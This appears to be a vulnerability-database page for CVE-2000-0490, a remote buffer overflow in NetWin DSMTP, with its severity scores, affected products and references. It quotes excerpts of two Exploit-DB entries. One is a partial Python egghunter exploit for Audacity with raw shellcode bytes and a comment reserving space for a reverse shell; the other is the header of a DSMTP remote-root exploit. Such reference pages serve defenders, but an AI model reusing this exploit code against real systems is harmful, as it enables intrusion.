CVE-2000-0490
published 2000-06-01
CVE-2000-0490: Buffer overflow in the NetWin DSMTP 2.7q in the NetWin dmail package allows remote attackers to execute arbitrary commands via a long ETRN request.
Priority P338 · critical · 10 · CVSS 2.0
AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 6.24% (92.7th percentile)
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| netwin | dmail | — | — |
| netwin | dmail | — | — |
| netwin | dmail | — | — |
| netwin | dmail | — | — |
| netwin | dmail | — | — |
| netwin | dmail | — | — |
No detection rules found.
Exploit-DB
Audacity 1.2 - '.gro' Universal Buffer Overflow (Egghunter)
exploitdb·2009-08-24
CVE-2009-0490 Audacity 1.2 - '.gro' Universal Buffer Overflow (Egghunter)
---
#!/usr/bin/env python
#
# Audacity
print " [+] Creating eviL .gro file..."
buff = ("\x44" * 174)
buff += ("\xEB\x08\x90\x90")
buff += ("\x22\x23\x17\x01")
buff += "\x90"* 4
buff += ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"\x57\x30\x30\x54" # this is the egg...
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
buff += ("\xCC" * 1000);
buff += "W00TW00T"
# Reverse shellcode to 192.168.2.3 change as you see fit (2000 bytes for space)
Exploit-DB
NetWin DMail 2.7/2.8 - ETRN Buffer Overflow
exploitdb·2000-06-01
CVE-2000-0490 NetWin DMail 2.7/2.8 - ETRN Buffer Overflow
---
// source: https://www.securityfocus.com/bid/1297/info
NetWin's DMail is an alternative mail-server solution for Unix and NT servers. There is a buffer overflow vulnerability in the server daemon that could allow remote attackers to execute arbitrary commands as root or cause a denial of service. The overflow occurs when a large buffer is sent as the argument to the ETRN command: if over 260 characters are sent, the stack is corrupted and the mail server will crash.
/*
Netwin DSMTP Server v2.7q remote-root exploit
[email protected] | [email protected]
written just for fun : ) heh,
tested arch = x86/Linux mdk7.0
I will port this to Solaris & FreeBSD when I have time...
check http://gsu.linux.org.tr/~noir/ offsets for other Linux distros.
greet
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2000-05/0407.html
http://netwinsite.com/dmail/security.htm
http://www.securityfocus.com/bid/1297
https://exchange.xforce.ibmcloud.com/vulnerabilities/4579